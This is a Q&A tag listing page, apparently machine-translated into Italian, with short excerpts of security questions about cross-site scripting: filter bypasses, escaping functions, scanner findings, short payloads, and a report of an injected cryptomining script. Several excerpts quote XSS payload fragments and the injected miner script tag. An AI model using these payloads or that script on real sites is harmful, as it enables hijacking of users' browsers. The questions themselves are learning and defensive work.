Domande con tag 'xss'

domande con tag
0
risposte

XSS codifica / decodifica interpretazioni di caratteri strani

Qualcuno può dirmi perché non riesco a riflettere su questo XSS? O perché questo è filtrato o meno il rendering? Il post inviato è: ... Content-Length: 91 add=1&reference=A</><img src=a onalert=alert(1)>EXPXSS&name=exam...
posta 30.01.2015 - 13:06
0
risposte

Vettori XSS per nuova immagine ()

Quali sono i possibili vettori XSS per questo codice JavaScript new Image().src = encodeURI('[user url here]'); Supponiamo due casi: [user url here] è una stringa fornita dall'utente (senza convalida) [user url here] è un...
posta 12.06.2014 - 21:58
0
risposte

Quanto è sicura la funzione Apache's Commons StringEscapeUtils.escapeXml per prevenire XSS

Sto usando escapeXML StringEscapeUtils.escapeXml per impedire XSS nella mia applicazione Java. Ma mi chiedo se risolva XSS al massimo. Ho provato alcuni vettori di attacco XSS, e escapeXml sembra funzionare bene. Fondamentalmente la maggio...
posta 05.05.2014 - 09:21
4
risposte

Come funziona XSS? [chiuso]

Ho pochissima esperienza nello sviluppo web, ma sono interessato alla sicurezza. Tuttavia, non ho capito appieno come funziona XSS. Puoi spiegarlo a med? L'articolo di Wikipedia mi dà una buona idea, ma non credo di capirlo molto bene.     
posta 28.12.2010 - 17:58
1
risposta

È possibile ottenere un flash src dopo un reindirizzamento o un elemento all'interno di un tag embed / object / iframe (cross-domain)?

L'URL example.com/auth reindirizzerà automaticamente l'utente (HTTP 302) a example.com/signed_in.SWF?token=SENSITIVE. È possibile che un utente malintenzionato rubi il token, utilizzando javascript o flash, nell'esempio seguente? Come? <...
posta 28.08.2015 - 22:57
1
risposta

Injected Javascript nel mio documento HTML

Recentemente ho notato il seguente javascript su molte delle mie pagine (di solito appena prima della chiusura del body tag): <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptok...
posta 08.06.2018 - 12:13
3
risposte

In che modo il tag di ancoraggio (a) consente di eseguire un XSS riflesso?

Stavo esaminando il OWASP XSS Filter Evasion Cheat Sheet e e mi sono imbattuto in questa sezione dove c'è un tag di ancoraggio usato per fare un XSS nei seguenti moduli: <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org...
posta 05.05.2014 - 05:49
1
risposta

In che modo OWASP ZAP trova Reflected XSS?

Che cosa sto facendo: Sto usando OWASP Zap per trovare vulnerabilità in un sito (ho il consenso del proprietario) e Zap ha scoperto una vulnerabilità legata all'XSS riflessa dopo aver eseguito una scansione attiva su una richiesta POST. Mi...
posta 09.11.2018 - 02:08
4
risposte

payload XSS inferiore a 20 caratteri

Per un progetto universitario devo eseguire un'analisi su un'applicazione web per scoprire le vulnerabilità XSS. Dopodiché devo segnalare e creare test automatici per dimostrare le vulnerabilità che ho scoperto. Ho scoperto una vulnerabilità...
posta 09.12.2018 - 19:04
4
risposte

Utilizzo di XSS basato su DOM per reindirizzare a domini diversi o eseguire script?

Stavo provando le mie mani su XSS basato su DOM. Mi sono imbattuto in uno scenario in cui una stringa controllata dall'utente dall'URL è inclusa in JavaScript come di seguito. var userControlled=substring of URL; window.location="/abc/xyz?para...
posta 21.11.2011 - 11:45